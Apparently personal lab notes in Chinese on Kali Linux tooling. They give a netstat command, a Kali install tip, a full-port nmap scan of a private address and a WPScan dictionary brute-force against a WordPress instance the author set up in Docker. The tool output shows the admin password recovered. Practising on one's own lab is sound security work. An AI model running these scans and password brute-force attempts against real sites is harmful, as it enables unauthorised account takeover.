1. 端口查看命令

netstat -lntu

2.安装kali

安装时注意需要选定grub安装盘，默认是手动指定，使用默认无法安装成功。

3.端口扫描

nmap -p 1-65535 192.168.124.74

4.wpscan

4.1 安装wordpress
使用docker直接安装，安装完成后，设置admin密码。

4.2 使用wpscan扫描
wpscan需要到官网下载数据库，然后拷贝到其data文件夹。
使用字典暴力破解。
创建一个txt文件，将所有可能的密码写入，
使用命令参数

wpscan -u 192.168.124.74:31615 -e u --wordlist /root/wordlist.txt

测试结果

[!] Default first WordPress username 'admin' is still used
[+] Starting the password brute forcer
  [+] [SUCCESS] Login : admin Password : ni@zhendebuka

  Brute Forcing 'admin' Time: 00:00:00 <================================================================                 > (4 / 5) 80.00%  ETA: 00:00:00
  +----+-------+------+---------------+
  | Id | Login | Name | Password      |
  +----+-------+------+---------------+
  | 1  | admin |      | ni@zhendebuka |
  +----+-------+------+---------------+

[+] Finished: Mon Mar 26 06:06:33 2018
[+] Requests Done: 93
[+] Memory used: 19.066 MB
[+] Elapsed time: 00:00:06
root@kali:~#